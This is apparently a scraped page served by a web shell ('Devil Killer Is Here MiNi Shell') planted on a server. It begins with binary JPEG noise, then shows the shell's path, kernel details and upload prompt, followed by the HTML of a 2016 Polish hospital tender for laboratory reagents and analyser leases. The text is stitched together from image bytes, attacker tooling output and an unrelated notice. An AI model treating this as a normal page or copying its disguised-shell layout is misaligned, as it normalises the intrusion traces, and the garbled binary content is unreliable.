JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160705/120617-N-2016.html

<p class="kh_header"><b>Bochnia: Dostawa odczynników wraz z dzierżawą aparatury diagnostycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni
 Szpital Powiatowy im. bł. Marty Wieckiej</b><br>
<b>Numer ogłoszenia: 120617 - 2016; data zamieszczenia: 05.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników wraz z dzierżawą aparatury diagnostycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni
 Szpital Powiatowy im. bł. Marty Wieckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.1)	Przedmiotem Zamówienia jest Dostawa odczynników wraz z dzierżawą aparatury diagnostycznej dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni  Szpital Powiatowy im. bł. Marty Wieckiej (część I) 
II.1.2)	Przedmiot zamówienia został podzielony na 16 pakietów:
Pakiet nr 1 - Odczynniki do immunochemii wraz z dzierżawą analizatora 
Pakiet nr 2 - Odczynniki biochemiczne wraz z dzierżawą analizatora 
Pakiet nr 3 - Odczynniki  do koagulologii wraz z dzierżawą analizatora 
Pakiet nr 4 - Odczynniki do hematologii wraz z dzierżawą analizatora 
Pakiet nr 5 - Odczynniki immunochemiczne wraz z dzierżawą analizatora (II)
Pakiet nr 6 - Odczynniki do badań serologicznych krwi wraz z dzierżawą aparatury
Pakiet nr 7 - Testy paskowe do identyfikacji drobnoustrojów wraz z dzierżawą aparatury
Pakiet nr 8  - Płytki gotowe, testy lateksowe, odczynniki  
Pakiet nr 9 - Odczynniki do aparatu Sysmex KX-21
Pakiet nr 10 - Odczynniki serologiczne  
Pakiet nr 11 - Krążki antybiotykowe i diagnostyczne
Pakiet nr 12 - Płytki gotowe chromogenne
Pakiet nr 13 - Szczepy wzorcowe z kolekcji amerykańskiej ATCC
Pakiet nr 14 - Testy immunochromatograficzne
Pakiet nr 15 - System paskowy do ilościowego określania  MIC na paskach plastikowych
Pakiet nr 16 - Odczynniki laboratoryjne.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">III.5.1)	Oświadczenie Wykonawcy o dopuszczeniu wyrobów medycznych do obrotu i stosowania na terenie Polski (według załącznika nr 5).
III.5.2)	dla pakietu 1 - 7 
1).	Karta katalogowa lub folder w j. polskim - ze zdjęciem/rysunkiem lub inne dokumenty w języku polskim potwierdzające oferowane parametry techniczno - funkcjonalne zawierające dane określone w wymaganiach dla aparatury diagnostycznej, potwierdzone za zgodność pozwalająca Zamawiającemu na stwierdzenie spełniania wymaganych parametrów - każda strona musi zostać opisana którego pakietu i pozycji dotyczy,
2).	Karty charakterystyki odczynników (w wersji elektronicznej) - każda strona musi zostać opisana którego pakietu i pozycji dotyczy,
III.5.3)	dla pakietu 5 
1)	Metodykę w języku polskim, z uwzględnieniem informacji nt.: zakresu pomiarowego (liniowości testu), czułości testu (granicy wykrywalności analitycznej), trwałości odczynnika po otwarciu opakowania, trwałości odczynnika na pokładzie analizatora dla wszystkich zapropanowanych odczynników.
2)	Karty Charakterystyk Substancji uznanych za niebezpieczne dla odczynników sklasyfikowanych jako substancje i mieszaniny niebezpieczne (w wersji elektronicznej) 
III.5.4)	dla pakietu 8, 12
1).	Certyfikat ISO 9001 na produkcję podłoży gotowych na płytkach,
2).	Certyfikaty Kontroli Jakości przykładowy dla podłoży na płytkach,
3).	Certyfikat ISO 13485:2003,
4).	Wykaz stosowanych przez Wykonawcę terminów ważności pożywek, potwierdzający wymagane terminy  przez Zamawiającego
III.5.5)	dla pakietu 11 - Certyfikaty Kontroli Jakości przykładowy dla krążków antybiotykowych
III.5.6)	dla pakietu 15 - przykładowy certyfikat kontroli jakości,

Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę
Zamawiający oceniać będzie spełnienie potwierdzenia że oferowane dostawy odpowiadają określonym wymaganiom, w oparciu o przedstawiony przez Wykonawcę dokument, o którym mowa w punkcie III.5) Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1)	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
III.6.2)	Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych (każda strona dokumentu) za zgodność z oryginałem przez  Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostaw częściowych - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy z zastrzeżeniem art. 144 ust. 1 ustawy Prawo zamówień publicznych mogą być dokonywane za zgodą obu Stron, wyrażoną na piśmie, pod rygorem nieważności. 
2.	Strony dopuszczają zmiany w umowie w następującym zakresie:
a.	nazwy produktu przy zachowaniu jego istotnych parametrów,
b.	sposobu konfekcjonowania,
c.	numeru katalogowego poszczególnych Towarów 
d.	dostarczania innego produktu, przy zachowaniu jego istotnych parametrów, w przypadku ograniczenia dostępności produktu objętego umową, w szczególności zakończenia produkcji oferowanego produktu, wygaśnięcia rejestracji oferowanego produktu, zakazu używania danego produktu wydanego przez właściwy organ. 
e.	zmiany terminu realizacji w przypadku nie zrealizowania wartości umowy na poziomie min. 60% w terminie jej obowiązywania, przewiduje się możliwość jej przedłużenia o czas niezbędny do zrealizowania ww. wartości. Przedłużenie terminu obowiązywania umowy może nastąpić na wniosek każdej ze stron. W przypadku braku zgody jednej ze stron na przedłużenie obowiązywania umowy, Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu zmniejszenia Zamówienia.
3.	Wykonawca powinien wykazać okoliczności, o których mowa w ust. 2 .
4.	Wykonawca w sytuacji określonej w ust. 2 pkt d, w porozumieniu z Zamawiającym zaproponuje, w terminie do 5 dni od powzięcia informacji o okolicznościach tam wskazanych, produkt równoważny na zasadach wynikających z ust. 7, z zachowaniem formy pisemnej lub mailowej pod rygorem nieważności.
5.	W przypadku zmiany wielkości opakowania wprowadzonej przez producenta, strony dopuszczają zmianę ceny za zbiorcze opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w stosunku do ceny jednostkowej poszczególnych Towarów objętej umową
6.	Wykonawca zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przetargowej przez okres trwania umowy, przy czym w czasie trwania umowy ceny brutto ulegają zmianie w przypadku wzrostu/spadku stawki podatku VAT. W przypadku urzędowej zmiany stawki VAT, uwzględnienie nowej stawki nastąpi automatycznie w dacie określonej przez właściwe przepisy prawa, bez konieczności zawierania odrębnego aneksu. 
7.	Za zgodą Zamawiającego Wykonawca może zaoferować odpowiednik, po cenie nie wyższej niż cena produktu objętego umową. 
8.	Zamawiający każdorazowo dopuszcza dostawy poszczególnych Towarów objętych umową po cenach niższych niż określone w niniejszej umowie. Wystawienie faktury z ceną niższą niż wymieniona w załączniku nr 1 do niniejszej umowy jest równoznaczne z zaoferowaniem przez Wykonawcę niższej ceny.
9.	Zaistnienie okoliczności wymienionych w ust 7-8 nie wymaga sporządzenia aneksu.
10.	W przypadku zmiany bądź rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest niezwłocznie w formie pisemnej wykazać Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bochnia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej
32-700, Bochnia
ul. Krakowska 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2016 godzina 13:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Bochni przy ul. Krakowskiej 31, na Dzienniku podawczym pokój nr 3, Pawilon A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Odczynniki do immunochemii wraz z dzierżawą analizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń   
1.	FSH	660
2.	Progesteron	600
3.	CKMB masa	510
4.	HIV  p/c	720
5.	HCV  p/c	1200
6.	EBV IgM	60
7.	Rubella IgM	150
8.	Rubella IgG	240
9.	CMV IgM	660
10.	CMV IgG	480
11.	Estradiol	600
12.	D-DIMERY	1020
13.	p/c HBs	180
14.	Vit. D3 metabolit	180
15.	NT-proBNP	120
16.	IgE całkowite	120
17.	Prokalcytonina	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Odczynniki biochemiczne wraz z dzierżawą analizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń  
1.	Wapń 	1500
2.	Żelazo 	1863
3.	TIBC, UIBC	300
4.	Magnez 	1964
5.	Bilirubina całkowita 	3750
6.	Cholesterol 	4800
7.	HDL cholesterol 	2800
8.	Glukoza 	20800
9.	Trójglicerydy	4000
10.	Mocznik 	7518
11.	Kwas moczowy	1600
12.	Bilirubina  Bezpośrednia	300
13.	Białko całkowite 	1200
14.	Białko w PMR i moczu 	1200
15.	Kreatynina	15400
16.	Fosfataza zasadowa 	1200
17.	Amylaza 	1200
18.	GGTP 	2400
19.	AspAT 	5500
20.	AIAT 	6500
21.	Lipaza	1400
22.	CRP	9300
23.	Kinaza kreatynowa	400
24.	Hemoglobina gikowana	900
25.	Albumina	600
26.	Alkohol etylowy 	700
Kontrole, kariblatory, mateiały zużywalne niezbędne do pracy analizatora do wykonania w/w oznaczeń oraz materiały do pomiaru ISE (Na - 20000 ozn, K- 21000 ozn., Cl-300 oz.) *.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Odczynniki  do koagulologii wraz z dzierżawą analizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość badań 
1.	PTT	9500
2.	APTT	6400
3.	Fibrynogen	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Odczynniki do hematologii wraz z dzierżawą analizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń
1.	Odczynniki niezbędne do wykonania oznaczeń morfologii 5Diff z podajnikiem 	25 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Odczynniki immunochemiczne wraz z dzierżawą analizatora (II).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń 
1.	Troponina T	3200
2.	ßHCG 	1000
3.	HBsAg	6000
4.	FTPSA	600
5.	fT4	2200
6.	fT3	1400
7.	TSH	7800
8.	TPSA total	1300
9.	HE4	200
10.	Ca 125	1700
11.	TOXO IgM	1317
12.	TOXO IgG	837
13.	Prolaktyna	1600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
